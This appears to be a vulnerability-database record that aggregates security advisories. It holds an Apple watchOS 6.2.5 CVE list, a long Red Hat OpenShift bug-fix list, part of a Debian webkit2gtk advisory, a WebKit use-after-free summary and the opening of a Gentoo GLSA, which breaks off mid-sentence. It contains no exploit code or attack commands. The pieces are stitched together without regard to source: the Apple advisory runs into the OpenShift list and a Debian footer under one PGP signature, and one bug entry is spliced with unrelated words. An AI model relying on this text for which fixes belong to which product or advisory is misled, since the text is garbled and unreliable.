Replacing state 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-05-26-5 watchOS 6.2.5 watchOS 6.2.5 addresses the following: Accounts Available for: Apple Watch Series 1 and later Impact: A remote attacker may be able to cause a denial of service Description: A denial of service issue was addressed with improved input validation. CVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt AppleMobileFileIntegrity Available for: Apple Watch Series 1 and later Impact: An application may be able to use arbitrary entitlements Description: This issue was addressed with improved checks. CVE-2020-9842: Linus Henze (pinauten.de) Audio Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative Audio Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative CoreText Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted text message may lead to application denial of service Description: A validation issue was addressed with improved input sanitization. CVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam’s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com FontParser Available for: Apple Watch Series 1 and later Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative ImageIO Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-3878: Samuel Groß of Google Project Zero ImageIO Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9789: Wenchao Li of VARAS@IIE CVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to determine another application's memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2020-9797: an anonymous researcher Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An integer overflow was addressed through improved input validation. CVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab Kernel Available for: Apple Watch Series 1 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab Kernel Available for: Apple Watch Series 1 and later Impact: A local user may be able to read kernel memory Description: An information disclosure issue was addressed with improved state management. CVE-2020-9811: Tielei Wang of Pangu Lab CVE-2020-9812: Derrek (@derrekr6) Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A logic issue existed resulting in memory corruption. CVE-2020-9813: Xinru Chi of Pangu Lab CVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab Kernel Available for: Apple Watch Series 1 and later Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue was addressed with improved state management. CVE-2020-9809: Benjamin Randazzo (@____benjamin) Mail Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted mail message may lead to heap corruption Description: A memory consumption issue was addressed with improved memory handling. CVE-2020-9819: ZecOps.com Mail Available for: Apple Watch Series 1 and later Impact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9818: ZecOps.com Python Available for: Apple Watch Series 1 and later Impact: A remote attacker may be able to cause arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2020-9793 SQLite Available for: Apple Watch Series 1 and later Impact: A malicious application may cause a denial of service or potentially disclose memory contents Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9794 System Preferences Available for: Apple Watch Series 1 and later Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with improved state handling. CVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro’s Zero Day Initiative WebKit Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved restrictions. CVE-2020-9802: Samuel Groß of Google Project Zero WebKit Available for: Apple Watch Series 1 and later Impact: A remote attacker may be able to cause arbitrary code execution Description: A logic issue was addressed with improved restrictions. CVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro’s Zero Day Initiative WebKit Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: An input validation issue was addressed with improved input validation. CVE-2020-9806: Wen Xu of SSLab at Georgia Tech CVE-2020-9807: Wen Xu of SSLab at Georgia Tech WebKit Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative WebRTC Available for: Apple Watch Series 1 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: An access issue was addressed with improved memory management. CVE-2019-20503: Natalie Silvanovich of Google Project Zero zsh Available for: Apple Watch Series 1 and later Impact: A local attacker may be able to elevate their privileges Description: An authorization issue was addressed with improved state management. CVE-2019-20044: Sam Foxman Additional recognition CoreText We would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance. ImageIO We would like to acknowledge Lei Sun for their assistance. IOHIDFamily We would like to acknowledge Andy Davis of NCC Group for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. Safari We would like to acknowledge Luke Walker of Manchester Metropolitan University for their assistance. WebKit We would like to acknowledge Aidan Dunlap of UT Austin for their assistance. Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". Bugs fixed (https://bugzilla.redhat.com/): 1808240 - Always return metrics value for pods under the user's namespace 1815189 - feature flagged UI does not always become available after operator installation 1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters 1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly 1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal 1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered 1878925 - 'oc adm upgrade --to ...' rejects versions which occur only in history, while the cluster-version operator supports history fallback 1880738 - origin e2e test deletes original worker 1882983 - oVirt csi driver should refuse to provision RWX and ROX PV 1886450 - Keepalived router id check not documented for RHV/VMware IPI 1889488 - The metrics endpoint for the Scheduler is not protected by RBAC 1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom 1896474 - Path based routing is broken for some combinations 1897431 - CIDR support for additional network attachment with the bridge CNI plug-in 1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes 1907433 - Excessive logging in image operator 1909906 - The router fails with PANIC error when stats port already in use 1911173 - [MSTR-998] Many charts' legend names show {{}} instead of words 1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting. 1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true) 1917893 - [ovirt] install fails: due to terraform error "Cannot attach Virtual Disk: Disk is locked" on vm resource 1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1926522 - oc adm catalog does not clean temporary files 1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes. 1928141 - kube-storage-version-migrator constantly reporting type "Upgradeable" status Unknown 1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it's storageclass is not yet finished, confusing users 1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x 1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade 1937085 - RHV UPI inventory playbook missing guarantee_memory 1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion 1938236 - vsphere-problem-detector does not support overriding log levels via storage CR 1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods 1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer 1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s] 1942913 - ThanosSidecarUnhealthy isn't resilient to WAL replays. 1943363 - [ovn] CNO should gracefully terminate ovn-northd 1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17 1948080 - authentication should not set Available=False APIServices_Error with 503s 1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set 1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0 1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer 1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs 1953264 - "remote error: tls: bad certificate" logs in prometheus-operator container 1955300 - Machine config operator reports unavailable for 23m during upgrade 1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set 1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set 1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters 1956496 - Needs SR-IOV Docs Upstream 1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret 1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid 1956964 - upload a boot-source to OpenShift virtualization using the console 1957547 - [RFE]VM name is not auto filled in dev console 1958349 - ovn-controller doesn't release the memory after cluster-density run 1959352 - [scale] failed to get pod annotation: timed out waiting for annotations 1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not 1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial] 1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects 1961391 - String updates 1961509 - DHCP daemon pod should have CPU and memory requests set but not limits 1962066 - Edit machine/machineset specs not working 1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent 1963053 - `oc whoami --show-console` should show the web console URL, not the server api URL 1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters 1964327 - Support containers with name:tag@digest 1964789 - Send keys and disconnect does not work for VNC console 1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7 1966445 - Unmasking a service doesn't work if it masked using MCO 1966477 - Use GA version in KAS/OAS/OauthAS to avoid: "audit.k8s.io/v1beta1" is deprecated and will be removed in a future release, use "audit.k8s.io/v1" instead 1966521 - kube-proxy's userspace implementation consumes excessive CPU 1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up 1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount 1970218 - MCO writes incorrect file contents if compression field is specified 1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel] 1970805 - Cannot create build when docker image url contains dir structure 1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io 1972827 - image registry does not remain available during upgrade 1972962 - Should set the minimum value for the `--max-icsp-size` flag of `oc adm catalog mirror` 1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run 1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established 1976301 - [ci] e2e-azure-upi is permafailing 1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change. 2007379 - Events are not generated for master offset for ordinary clock 2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace 2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address 2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error 2007522 - No new local-storage-operator-metadata-container is build for 4.10 2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10 2007580 - Azure cilium installs are failing e2e tests 2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10 2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes 2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures 2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow 2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates 2007802 - AWS machine actuator get stuck if machine is completely missing 2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator 2008119 - The serviceAccountIssuer field on Authentication CR is reseted to “” when installation process 2008151 - Topology breaks on clicking in empty state 2008185 - Console operator go.mod should use go 1.16.version 2008201 - openstack-az job is failing on haproxy idle test 2008207 - vsphere CSI driver doesn't set resource limits 2008223 - gather_audit_logs: fix oc command line to get the current audit profile 2008235 - The Save button in the Edit DC form remains disabled 2008256 - Update Internationalization README with scope info 2008321 - Add correct documentation link for MON_DISK_LOW 2008462 - Disable PodSecurity feature gate for 4.10 2008490 - Backing store details page does not contain all the kebab actions. 2010181 - Environment variables not getting reset on reload on deployment edit form 2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel] 2010341 - OpenShift Alerting Rules Style-Guide Compliance 2010342 - Local console builds can have out of memory errors 2010345 - OpenShift Alerting Rules Style-Guide Compliance 2010348 - Reverts PIE build mode for K8S components 2010352 - OpenShift Alerting Rules Style-Guide Compliance 2010354 - OpenShift Alerting Rules Style-Guide Compliance 2010359 - OpenShift Alerting Rules Style-Guide Compliance 2010368 - OpenShift Alerting Rules Style-Guide Compliance 2010376 - OpenShift Alerting Rules Style-Guide Compliance 2010662 - Cluster is unhealthy after image-registry-operator tests 2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent) 2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API 2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address 2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing 2010864 - Failure building EFS operator 2010910 - ptp worker events unable to identify interface for multiple interfaces 2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24 2010921 - Azure Stack Hub does not handle additionalTrustBundle 2010931 - SRO CSV uses non default category "Drivers and plugins" 2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well. 2011038 - optional operator conditions are confusing 2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass 2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's 2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image 2011368 - Tooltip in pipeline visualization shows misleading data 2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels 2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards 2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster 2011513 - Kubelet rejects pods that use resources that should be freed by completed pods 2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine" 2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented 2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore 2011733 - Repository README points to broken documentarion link 2011753 - Ironic resumes clean before raid configuration job is actually completed 2011809 - The nodes page in the openshift console doesn't work. You just get a blank page 2011822 - Obfuscation doesn't work at clusters with OVN 2011882 - SRO helm charts not synced with templates 2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot 2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages 2011903 - vsphere-problem-detector: session leak 2011927 - OLM should allow users to specify a proxy for GRPC connections 2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods 2011960 - [tracker] Storage operator is not available after reboot cluster instances 2011971 - ICNI2 pods are stuck in ContainerCreating state 2011972 - Ingress operator not creating wildcard route for hypershift clusters 2011977 - SRO bundle references non-existent image 2012069 - Refactoring Status controller 2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI 2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group 2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)" 2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig 2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off 2012407 - [e2e][automation] improve vm tab console tests 2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label 2012562 - migration condition is not detected in list view 2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written 2012780 - The port 50936 used by haproxy is occupied by kube-apiserver 2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working 2012902 - Neutron Ports assigned to Completed Pods are not reused Edit 2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack 2012971 - Disable operands deletes 2013034 - Cannot install to openshift-nmstate namespace 2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine) 2013199 - post reboot of node SRIOV policy taking huge time 2013203 - UI breaks when trying to create block pool before storage cluster/system creation 2013222 - Full breakage for nightly payload promotion 2013273 - Nil pointer exception when phc2sys options are missing 2013321 - TuneD: high CPU utilization of the TuneD daemon. 2013416 - Multiple assets emit different content to the same filename 2013431 - Application selector dropdown has incorrect font-size and positioning 2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8 2013545 - Service binding created outside topology is not visible 2013599 - Scorecard support storage is not included in ocp4.9 2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide) 2013646 - fsync controller will show false positive if gaps in metrics are observed. to user and tries to just load a blank screen on 'Add Capacity' button click 2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu 2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain. 2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart 'x% used' is in English 2015549 - Observe - Metrics: Column heading and pagination text is in English 2015557 - Workloads - DeploymentConfigs : Error message is in English 2015568 - Compute - Nodes : CPU column's values are in English 2015635 - Storage operator fails causing installation to fail on ASH 2015660 - "Finishing boot source customization" screen should not use term "patched" 2015793 - [hypershift] The collect-profiles job's pods should run on the control-plane node 2015806 - Metrics view in Deployment reports "Forbidden" when not cluster-admin 2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning 2015837 - OS_CLOUD overwrites install-config's platform.openstack.cloud 2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch 2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail 2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed) 2016008 - [4.10] Bootimage bump tracker 2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver 2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator 2016054 - No e2e CI presubmit configured for release component cluster-autoscaler 2016055 - No e2e CI presubmit configured for release component console 2016058 - openshift-sync does not synchronise in "ose-jenkins:v4.8" 2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager 2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers 2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters. 2016179 - Add Sprint 208 translations 2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager 2016235 - should update to 7.5.11 for grafana resources version label 2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails 2016334 - shiftstack: SRIOV nic reported as not supported 2016352 - Some pods start before CA resources are present 2016367 - Empty task box is getting created for a pipeline without finally task 2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts 2016438 - Feature flag gating is missing in few extensions contributed via knative plugin 2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc 2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets 2016453 - Complete i18n for GaugeChart defaults 2016479 - iface-id-ver is not getting updated for existing lsp 2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear 2016951 - dynamic actions list is not disabling "open console" for stopped vms 2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available 2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances 2017016 - [REF] Virtualization menu 2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn 2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly 2017130 - t is not a function error navigating to details page 2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue 2017244 - ovirt csi operator static files creation is in the wrong order 2017276 - [4.10] Volume mounts not created with the correct security context 2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed. 2022447 - ServiceAccount in manifests conflicts with OLM 2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules. 2025821 - Make "Network Attachment Definitions" available to regular user 2025823 - The console nav bar ignores plugin separator in existing sections 2025830 - CentOS capitalizaion is wrong 2025837 - Warn users that the RHEL URL expire 2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-* 2025903 - [UI] RoleBindings tab doesn't show correct rolebindings 2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel] 2026178 - OpenShift Alerting Rules Style-Guide Compliance 2026209 - Updation of task is getting failed (tekton hub integration) 2026223 - Internal error occurred: failed calling webhook "ptpconfigvalidationwebhook.openshift.io" 2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates 2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct 2026352 - Kube-Scheduler revision-pruner fail during install of new cluster 2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment 2026383 - Error when rendering custom Grafana dashboard through ConfigMap 2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation 2026396 - Cachito Issues: sriov-network-operator Image build failure 2026488 - openshift-controller-manager - delete event is repeating pathologically 2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined. 2039359 - `oc adm prune deployments` can't prune the RS where the associated Deployment no longer exists 2039382 - gather_metallb_logs does not have execution permission 2039406 - logout from rest session after vsphere operator sync is finished 2039408 - Add GCP region northamerica-northeast2 to allowed regions 2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration 2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment 2039491 - oc - git:// protocol used in unit tests 2039516 - Bump OVN to ovn21.12-21.12.0-25 2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate 2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled 2039541 - Resolv-prepender script duplicating entries 2039586 - [e2e] update centos8 to centos stream8 2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty 2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3' 2039670 - Create PDBs for control plane components 2039678 - Page goes blank when create image pull secret 2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported 2039743 - React missing key warning when open operator hub detail page (and maybe others as well) 2039756 - React missing key warning when open KnativeServing details 2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab 2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard 2039781 - [GSS] OBC is not visible by admin of a Project on Console 2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector 2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled 2039880 - Log level too low for control plane metrics 2039919 - Add E2E test for router compression feature 2039981 - ZTP for standard clusters installs stalld on master nodes 2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. 2043117 - Recommended operators links are erroneously treated as external 2043130 - Update CSI sidecars to the latest release for 4.10 2043234 - Missing validation when creating several BGPPeers with the same peerAddress 2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler 2043254 - crio does not bind the security profiles directory 2043296 - Ignition fails when reusing existing statically-keyed LUKS volume 2043297 - [4.10] Bootimage bump tracker 2043316 - RHCOS VM fails to boot on Nutanix AOS 2043446 - Rebase aws-efs-utils to the latest upstream version. 2043556 - Add proper ci-operator configuration to ironic and ironic-agent images 2043577 - DPU network operator 2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator 2043675 - Too many machines deleted by cluster autoscaler when scaling down 2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation 2043709 - Logging flags no longer being bound to command line 2043721 - Installer bootstrap hosts using outdated kubelet containing bugs 2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather 2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23 2043780 - Bump router to k8s.io/api 1.23 2043787 - Bump cluster-dns-operator to k8s.io/api 1.23 2043801 - Bump CoreDNS to k8s.io/api 1.23 2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown 2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected. 2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests 2052598 - kube-scheduler should use configmap lease 2052599 - kube-controller-manger should use configmap lease 2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh 2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid 2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop 2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. CVE-2020-13753 Milan Crha discovered that an attacker may be able to execute commands outside the bubblewrap sandbox. For the stable distribution (buster), these problems have been fixed in version 2.28.3-2~deb10u1. We recommend that you upgrade your webkit2gtk packages. For the detailed security status of webkit2gtk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/webkit2gtk Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl8PaKUACgkQEMKTtsN8 Tjaf3hAAjZCKrikC4P1I/xiuL6kRepTjURi3zeZl3YywPCFLi/irWXX+5U+ejZoM kek3wtdJc1thN8w9BbXhOVyLferb/xfnt5jUVtZ6JBNDKKWGXoTY0Qfdu2lH0vw5 IV1lf5bvOdawrw/tVS9Uy3dTN1kXEBZ3q3XCpRXrBWEkrXtWG/yznGy0duebnI5h PM7D6R4PIKiCB3HBe9rszCIQrYcGQ/U3x8a/FPnPUO2TCRfVZG918M9yO1fN1v2R +08h0DcOU8ggIJQwJA9hm/V3mJWpTayHh/ouTI8PrIcwG0T2/qbtUm/9cj0wvmXW Id+RgXtQAyKeXQoXD5oP9jzVDgmm7rn03Rn2FX5hzAdTJAqdvT/Mr4IDNcOgdS8O wXmGprdRvMzx0gXO5YpeTuhjQiCZS1fB9ByIOMq/7lIjpiBctrhTZQvlSMMyauIQ P7tTTT8zCZo0DIQc/c2KyCXlD9/ORZm801U5wpXwPXT9Zq8wRAp5PodK/4plOzKc JyJiPI6BR41+31C438nl3wifO/wLh8+6nHAb2rkRQSe6Tu9SKyqOmYT9Ev6JZi/1 R8NMBFSmTYM/XUv5ECsTeL3uLvDnCpKAR0EnWz5z1Cqy2AYzEthEf+1dwXAooYvO 2johOWMaUrSWJMsYdZjTFEahaCSO5oPTDlbZCB2yIgpc6P70irU= =L5lA -----END PGP SIGNATURE-----
var-201904-1398 A use after free issue was addressed with improved memory management. This issue affected versions prior to iOS 12, tvOS 12, Safari 12, iTunes 12.9 for Windows, iCloud for Windows 7.7. plural Apple There is a vulnerability in the use of freed memory due to a lack of memory management in the product.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A use-after-free vulnerability exists in WebKit components in several Apple products. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: December 02, 2018 Bugs: #667892 ID: 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.22.0 >= 2.22.0 Description =========== Multiple vulnerabilities have been discovered in 